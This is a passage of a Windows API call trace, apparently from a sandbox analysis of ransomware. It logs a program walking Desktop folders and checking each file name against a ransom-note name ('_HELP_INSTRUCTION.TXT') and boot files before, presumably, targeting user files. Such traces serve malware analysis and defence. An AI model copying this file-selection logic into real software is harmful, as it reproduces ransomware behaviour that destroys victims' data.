(lpFirst="rvzAqm2.flv", lpSrch="ntldr") returned 0x0 [0102.055] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="NTLDR") returned 0x0 [0102.055] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="NTDETECT.COM") returned 0x0 [0102.055] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="ntdetect.com") returned 0x0 [0102.056] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0102.056] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.056] lstrcmpW (lpString1="TrEKohawJ.m4a", lpString2="..") returned 1 [0102.056] lstrcmpW (lpString1="TrEKohawJ.m4a", lpString2=".") returned 1 [0102.056] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.056] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="ntldr") returned 0x0 [0102.056] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="NTLDR") returned 0x0 [0102.056] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0102.056] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="ntdetect.com") returned 0x0 [0102.056] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0102.056] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.056] lstrcmpW (lpString1="TxQmAhXtJ1.mp3", lpString2="..") returned 1 [0102.056] lstrcmpW (lpString1="TxQmAhXtJ1.mp3", lpString2=".") returned 1 [0102.056] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.056] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="ntldr") returned 0x0 [0102.056] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="NTLDR") returned 0x0 [0102.056] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0102.056] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="ntdetect.com") returned 0x0 [0102.056] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0102.056] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.056] lstrcmpW (lpString1="ySq45fyDTuTLWzePdp4.m4a", lpString2="..") returned 1 [0102.056] lstrcmpW (lpString1="ySq45fyDTuTLWzePdp4.m4a", lpString2=".") returned 1 [0102.056] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.056] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="ntldr") returned 0x0 [0102.056] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="NTLDR") returned 0x0 [0102.056] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0102.057] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="ntdetect.com") returned 0x0 [0102.057] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0102.057] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0102.057] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0102.057] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0102.057] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" [0102.057] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*" [0102.057] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0102.057] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0102.058] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0102.058] lstrcpyW (in: lpString1=0x17b644, lpString2="Ee7G-xHgdwJfqcsImMM" | out: lpString1="Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0102.058] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0102.058] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0102.058] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.058] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0102.058] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.058] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.058] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.058] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.058] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.058] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.058] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.059] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0102.059] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0102.059] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0102.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.059] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.059] lstrcmpW (lpString1="KZ7l4KmpPgbeETV_wvF", lpString2="..") returned 1 [0102.059] lstrcmpW (lpString1="KZ7l4KmpPgbeETV_wvF", lpString2=".") returned 1 [0102.059] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0102.059] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0102.060] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="KZ7l4KmpPgbeETV_wvF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" [0102.060] SetErrorMode (uMode=0x1) returned 0x1 [0102.060] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" [0102.060] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0102.060] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0102.060] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*" [0102.060] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0102.061] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0102.061] lstrcpyW (in: lpString1=0x17b644, lpString2="KZ7l4KmpPgbeETV_wvF" | out: lpString1="KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0102.061] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.061] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.061] lstrcmpW (lpString1="5OmbcR7YDw3.bmp", lpString2="..") returned 1 [0102.061] lstrcmpW (lpString1="5OmbcR7YDw3.bmp", lpString2=".") returned 1 [0102.061] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.061] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="ntldr") returned 0x0 [0102.061] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="NTLDR") returned 0x0 [0102.061] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0102.062] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="ntdetect.com") returned 0x0 [0102.062] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0102.062] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.062] lstrcmpW (lpString1="iyIk6.jpg", lpString2="..") returned 1 [0102.062] lstrcmpW (lpString1="iyIk6.jpg", lpString2=".") returned 1 [0102.062] StrStrW (lpFirst="iyIk6.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.062] StrStrW (lpFirst="iyIk6.jpg", lpSrch="ntldr") returned 0x0 [0102.062] StrStrW (lpFirst="iyIk6.jpg", lpSrch="NTLDR") returned 0x0 [0102.062] StrStrW (lpFirst="iyIk6.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0102.062] StrStrW (lpFirst="iyIk6.jpg", lpSrch="ntdetect.com") returned 0x0 [0102.062] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0102.062] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.062] lstrcmpW (lpString1="rVKi.xlsx", lpString2="..") returned 1 [0102.062] lstrcmpW (lpString1="rVKi.xlsx", lpString2=".") returned 1 [0102.062] StrStrW (lpFirst="rVKi.xlsx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.062] StrStrW (lpFirst="rVKi.xlsx", lpSrch="ntldr") returned 0x0 [0102.062] StrStrW (lpFirst="rVKi.xlsx", lpSrch="NTLDR") returned 0x0 [0102.062] StrStrW (lpFirst="rVKi.xlsx", lpSrch="NTDETECT.COM") returned 0x0 [0102.062] StrStrW (lpFirst="rVKi.xlsx", lpSrch="ntdetect.com") returned 0x0 [0102.062] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0102.062] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.062] lstrcmpW (lpString1="UcgnfCPkkGAfI8Infh.pdf", lpString2="..") returned 1 [0102.062] lstrcmpW (lpString1="UcgnfCPkkGAfI8Infh.pdf", lpString2=".") returned 1 [0102.062] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.062] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="ntldr") returned 0x0 [0102.062] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="NTLDR") returned 0x0 [0102.063] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="NTDETECT.COM") returned 0x0 [0102.063] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="ntdetect.com") returned 0x0 [0102.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0102.063] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.063] lstrcmpW (lpString1="XiCIIZYNum_VSBs.wav", lpString2="..") returned 1 [0102.063] lstrcmpW (lpString1="XiCIIZYNum_VSBs.wav", lpString2=".") returned 1 [0102.063] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.063] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="ntldr") returned 0x0 [0102.063] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="NTLDR") returned 0x0 [0102.063] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="NTDETECT.COM") returned 0x0 [0102.063] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="ntdetect.com") returned 0x0 [0102.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0102.063] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.063] lstrcmpW (lpString1="ZxQsBuyh.ods", lpString2="..") returned 1 [0102.063] lstrcmpW (lpString1="ZxQsBuyh.ods", lpString2=".") returned 1 [0102.063] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.063] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="ntldr") returned 0x0 [0102.063] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="NTLDR") returned 0x0 [0102.063] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="NTDETECT.COM") returned 0x0 [0102.063] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="ntdetect.com") returned 0x0 [0102.063] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0102.063] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0102.063] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0102.064] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0102.064] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" [0102.064] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*" [0102.064] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0102.064] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0102.065] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0102.065] lstrcpyW (in: lpString1=0x17b644, lpString2="KZ7l4KmpPgbeETV_wvF" | out: lpString1="KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0102.065] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0102.065] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0102.065] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.065] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0102.065] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.065] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.065] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.065] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.065] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.065] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.065] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0102.065] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0102.066] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0102.066] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.066] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.066] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.066] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.066] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.066] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.066] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.066] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.066] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.066] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.067] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.067] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.067] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.067] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.067] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.067] lstrcmpW (lpString1="ZBiOZr_ 3-6W", lpString2="..") returned 1 [0102.067] lstrcmpW (lpString1="ZBiOZr_ 3-6W", lpString2=".") returned 1 [0102.067] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0102.067] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0102.067] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0102.067] SetErrorMode (uMode=0x1) returned 0x1 [0102.067] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0102.067] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0102.067] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0102.067] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*" [0102.067] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0102.071] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0102.071] lstrcpyW (in: lpString1=0x17b644, lpString2="ZBiOZr_ 3-6W" | out: lpString1="ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0102.071] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.071] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.071] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.071] lstrcmpW (lpString1="UzONnSwswGOnlESVfL.mp3", lpString2="..") returned 1 [0102.071] lstrcmpW (lpString1="UzONnSwswGOnlESVfL.mp3", lpString2=".") returned 1 [0102.071] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.071] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="ntldr") returned 0x0 [0102.071] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="NTLDR") returned 0x0 [0102.071] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0102.071] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="ntdetect.com") returned 0x0 [0102.071] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\" [0102.071] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.071] lstrcmpW (lpString1="xtxVVYFEc-NWjSwclj.flv", lpString2="..") returned 1 [0102.071] lstrcmpW (lpString1="xtxVVYFEc-NWjSwclj.flv", lpString2=".") returned 1 [0102.071] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.071] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="ntldr") returned 0x0 [0102.071] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="NTLDR") returned 0x0 [0102.071] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="NTDETECT.COM") returned 0x0 [0102.071] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="ntdetect.com") returned 0x0 [0102.072] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\" [0102.072] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 